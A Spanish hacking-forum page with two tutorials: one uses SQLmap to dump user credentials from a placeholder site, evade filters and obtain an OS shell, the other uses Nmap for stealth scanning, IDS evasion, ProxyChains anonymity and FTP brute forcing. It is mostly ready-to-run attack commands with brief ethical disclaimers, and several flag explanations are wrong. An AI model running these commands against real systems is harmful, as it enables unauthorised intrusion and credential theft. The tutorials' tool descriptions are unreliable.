elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado:


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / [TUTORIAL] Cómo romper aplicaciones web con SQLmap (legalmente) en: 8 Enero 2025, 10:35 am
Este tutorial es para los que creen que probar SQL Injection es escribir comillas en un campo de texto. Aquí vamos a llevar SQLmap al siguiente nivel. Rápido, directo y sin rodeos.



Preparación del entorno

Primero, asegúrate de tener SQLmap instalado. Si usas Linux:
Código:
sudo apt update && sudo apt install sqlmap

Para Windows, descárgalo desde su página oficial.

(Usa una máquina virtual o VPN para mantenerte seguro mientras experimentas.)


Primer escaneo: Básico pero funcional

Para probar rápidamente si un sitio es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs

-u: La URL objetivo.
--dbs: Enumera las bases de datos disponibles si encuentra vulnerabilidades.



Extracción de información (Bases de datos, tablas y columnas)

Obtener bases de datos:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --dbs

Elegir una base de datos y sacar tablas:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb --tables

Ver columnas de una tabla:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users --columns

Sacar datos (usuarios y contraseñas):
Código:
sqlmap -u "http://target.com/vuln.php?id=1" -D targetdb -T users -C username,password --dump



Saltarse restricciones (Bypass)

Usar técnicas de evasión:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment

Con ProxyChains para anonimato:
Código:
proxychains sqlmap -u "http://target.com/vuln.php?id=1" --dbs

Dividir peticiones para confundir el análisis de tráfico:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --level=5 --risk=3



Automatizar fuerza bruta

Si quieres probar contraseñas rápidamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --passwords

Prueba diccionarios personalizados:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --wordlist=users.txt



Subir shells (para auditorías internas)

Subir un shell interactivo directamente:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-shell

Acceder al sistema operativo si el servidor es vulnerable:
Código:
sqlmap -u "http://target.com/vuln.php?id=1" --os-pwn



SQLmap no es solo para encontrar vulnerabilidades; es para entender cómo funcionan las aplicaciones y cómo protegerlas. Si algo no debería estar expuesto, avisa antes de explotarlo.
2  Seguridad Informática / Hacking / [TUTORIAL] Escaneo avanzado y enumeración con Nmap y NSE en: 6 Enero 2025, 20:59 pm
Este tutorial va para los que creen que saben usar Nmap solo porque usaron nmap -sS target. Aquí vamos más allá de lo básico, revelando técnicas avanzadas
 y scripts NSE (Nmap Scripting Engine) para sacar información oculta. Y sí, sin cruzar la línea de lo ilegal.



Configuración del entorno (No seas flojo, hazlo bien)

Primero, asegúrate de tener Nmap instalado:

Código:
sudo apt update && sudo apt install nmap

Para Windows:

Descarga el instalador desde https://nmap.org/

Opcional pero recomendable:

Instala Tor y ProxyChains para anonimizarte un poco.

Usa una máquina virtual o una VPN si quieres sentirte más seguro mientras trasteas.



Escaneos básicos pero con clase

No vamos a perder tiempo con tonterías. Aquí lo que importa:

Escaneo de puertos abiertos con información detallada:

Código:
nmap -sS -sV -O -A -T4 target

-sS: Escaneo TCP SYN stealth (para no levantar sospechas).

-sV: Detección de versiones.

-O:
Detección de sistema operativo.

-A: Incluye detección de SO, traceroute y scripts.

-T4: Velocidad rápida (ajústala según tu red).



Scripts NSE - Donde empieza la diversión

NSE es la joya oculta de Nmap. Permite automatizar tareas aburridas, como encontrar vulnerabilidades o revisar configuraciones pésimas.

Ejemplos útiles de scripts NSE:

1. Enumerar servicios y vulnerabilidades web:
Código:
nmap -p 80,443 --script=http-enum target

2. Explorar vulnerabilidades específicas:
Código:
nmap --script=vuln target

3.  Búsqueda de directorios ocultos:
Código:
nmap -p 80 --script=http-enum,http-headers,http-title target



Evasión de firewalls y detección sigilosa

Porque no todo en la vida es escanear a lo bruto. Aquí unas tácticas para pasar desapercibido

Fragmentación de paquetes:
Código:
nmap -sS -f target
Divide los paquetes en fragmentos más pequeños para confundir IDS.

Cambiar el orden de los paquetes:
Código:
nmap --randomize-hosts target
Desordena el escaneo para que no parezca un patrón reconocible.

Usar proxies y anonimato:
Código:
proxychains nmap -sS target
Con ProxyChains y Tor puedes ocultar tu IP mientras juegas con las redes de otros.



Evasión de firewalls y detección sigilosa

Alguien dejó credenciales admin/admin? Lo sabrás rápido:
Código:
nmap --script=ftp-brute target

Prueba contraseñas comunes en servidores FTP mal configurados. Usa tu propio diccionario si quieres hacerlo bien:
Código:
nmap --script=ftp-brute --script-args userdb=users.txt,passdb=pass.txt target



Ahora tienes herramientas para moverte. Pero no te pases. Esto es hacking ético: aprendes para defender, no para molestar. Si algo no debería estar expuesto, informa antes de explotar.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines